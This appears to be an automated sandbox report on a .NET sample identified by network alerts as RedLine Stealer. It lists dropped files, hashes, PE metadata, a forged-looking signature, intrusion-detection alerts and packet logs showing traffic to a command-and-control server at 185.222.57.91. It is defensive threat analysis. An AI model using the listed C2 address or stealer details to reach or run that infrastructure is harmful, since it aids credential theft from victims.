                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpEAB6.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpEAC7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpEAD7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpEAE8.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpEAF9.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpFE0D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpFE1D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpFE2E.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpFE4E.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpFEC.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\WltfeVzR.exe

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):661000
                      Entropy (8bit):7.703731760214224
                      Encrypted:false
                      SSDEEP:12288:Kqw9IGMwbNVlOVbgRtMNgO6feo001kwahbgoZeSnt8uboW0ekR:DwDb3lOBgR6N7Nj0SwVoZPnt8uboR
                      MD5:05211F48DBBB4EF891DB1E158FF87E28
                      SHA1:20D0D8CEA312FBCA71DD0C00A97A0C346F886628
                      SHA-256:1D614E39746DFC7E2FD8E4D133C5609CE9CC67F80E6468EA189683FCA168CDD6
                      SHA-512:3D6D6480EED39418DF3A86141890120507DBD345BE23FA45472DBC2E6521CBD3553212455CCB8B21051BCBE4151844EFA1FB5DC9936942EC43DDBA7A961D9388
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 68%
                      • Antivirus: Virustotal, Detection: 45%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.f..............0......$......b.... ........@.. ....................... ............@.....................................O........................6........................................................... ............... ..H............text...h.... ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\WltfeVzR.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.703731760214224
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      • Win32 Executable (generic) a (10002005/4) 49.93%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:tfF3UBTdr8.exe
                      File size:661'000 bytes
                      MD5:05211f48dbbb4ef891db1e158ff87e28
                      SHA1:20d0d8cea312fbca71dd0c00a97a0c346f886628
                      SHA256:1d614e39746dfc7e2fd8e4d133c5609ce9cc67f80e6468ea189683fca168cdd6
                      SHA512:3d6d6480eed39418df3a86141890120507dbd345be23fa45472dbc2e6521cbd3553212455ccb8b21051bcbe4151844efa1fb5dc9936942ec43ddba7a961d9388
                      SSDEEP:12288:Kqw9IGMwbNVlOVbgRtMNgO6feo001kwahbgoZeSnt8uboW0ekR:DwDb3lOBgR6N7Nj0SwVoZPnt8uboR
                      TLSH:EAE402A82706D613C9A287B41A71F3F517BC2EDEBC02C21B9EC9ADEF7865F160C50152
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.f..............0......$......b.... ........@.. ....................... ............@................................

                      File Icon

                      Icon Hash:9c306e8c8cb682ac

                      Static PE Info

                      General

                      Entrypoint:0x49d562
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66CD3A1B [Tue Aug 27 02:29:47 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Authenticode Signature

                      Signature Valid:false
                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                      Signature Validation Error:The digital signature of the object did not verify
                      Error Number:-2146869232
                      Not Before, Not After
                      • 13/11/2018 01:00:00 09/11/2021 00:59:59
                      Subject Chain
                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                      Version:3
                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                      Serial:7C1118CBBADC95DA3752C46E47A27438

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9d5100x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x1de8.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x9e0000x3608
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x9b5680x9b800b497288c67b213f2afbcc2a841253daaFalse0.881082320136656data7.71081119448831IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x9e0000x1de80x2000a1c144d286582f221b963d6041b25150False0.774169921875data7.338795857363799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xa00000xc0x400b9918b1deacb5fb173f91ece3d80f2bdFalse0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0x9e1600x1745PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9288232331710593
                      RT_GROUP_ICON0x9f8a80x14data0.9
                      RT_GROUP_ICON0x9f8bc0x14data1.05
                      RT_VERSION0x9f8d00x32cdata0.4248768472906404
                      RT_MANIFEST0x9fbfc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                      2024-08-30T08:02:02.637313+0200TCP2849662ETPRO MALWARE RedLine - CheckConnect Request14971155615192.168.2.5185.222.57.91
                      2024-08-30T08:02:17.981040+0200TCP2849351ETPRO MALWARE RedLine - EnvironmentSettings Request14971855615192.168.2.5185.222.57.91
                      2024-08-30T08:02:11.528172+0200TCP2849352ETPRO MALWARE RedLine - SetEnvironment Request14971455615192.168.2.5185.222.57.91
                      2024-08-30T08:02:20.454579+0200TCP2045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound15561549718185.222.57.91192.168.2.5
                      2024-08-30T08:02:20.867312+0200TCP2849352ETPRO MALWARE RedLine - SetEnvironment Request14972355615192.168.2.5185.222.57.91
                      2024-08-30T08:02:18.122869+0200TCP2046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)15561549718185.222.57.91192.168.2.5
                      2024-08-30T08:02:11.112782+0200TCP2045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound15561549711185.222.57.91192.168.2.5
                      2024-08-30T08:02:07.909323+0200TCP2045000ET MALWARE RedLine Stealer - CheckConnect Response15561549711185.222.57.91192.168.2.5
                      2024-08-30T08:02:12.923279+0200TCP2849662ETPRO MALWARE RedLine - CheckConnect Request14971855615192.168.2.5185.222.57.91
                      2024-08-30T08:02:08.278319+0200TCP2849351ETPRO MALWARE RedLine - EnvironmentSettings Request14971155615192.168.2.5185.222.57.91
                      2024-08-30T08:02:17.772516+0200TCP2045000ET MALWARE RedLine Stealer - CheckConnect Response15561549718185.222.57.91192.168.2.5
                      2024-08-30T08:02:22.423218+0200TCP2848200ETPRO MALWARE RedLine - GetUpdates Request14972455615192.168.2.5185.222.57.91
                      2024-08-30T08:02:08.366718+0200TCP2046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)15561549711185.222.57.91192.168.2.5

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Aug 30, 2024 08:02:01.806126118 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:01.953238010 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:01.953341961 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:01.976151943 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:01.981040955 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:02.324961901 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:02.330020905 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:02.560324907 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:02.637312889 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:02.695832968 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:02.840420961 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:07.767960072 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:07.909322977 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.075649023 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.076704025 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:08.081600904 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.278203011 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.278218985 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.278234959 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.278245926 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.278258085 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.278318882 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:08.278397083 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:08.366718054 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:08.418526888 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.104233027 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.104568958 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.112606049 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.112705946 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.112782001 CEST5561549711185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.112833023 CEST4971155615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.114465952 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.119326115 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.465809107 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.470654011 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.470693111 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.470700979 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.470710993 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.470736980 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.470783949 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.470849037 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.470932007 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.470941067 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.471050024 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.471057892 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.471067905 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.471116066 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.481496096 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.481504917 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.481513977 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.481549025 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.481558084 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.481564999 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.481587887 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.481622934 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.481623888 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.485285044 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.527038097 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.528172016 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.550050974 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.557401896 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.562309980 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.562319040 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.562328100 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.562335014 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.562361956 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.562371016 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.562447071 CEST5561549714185.222.57.91192.168.2.5
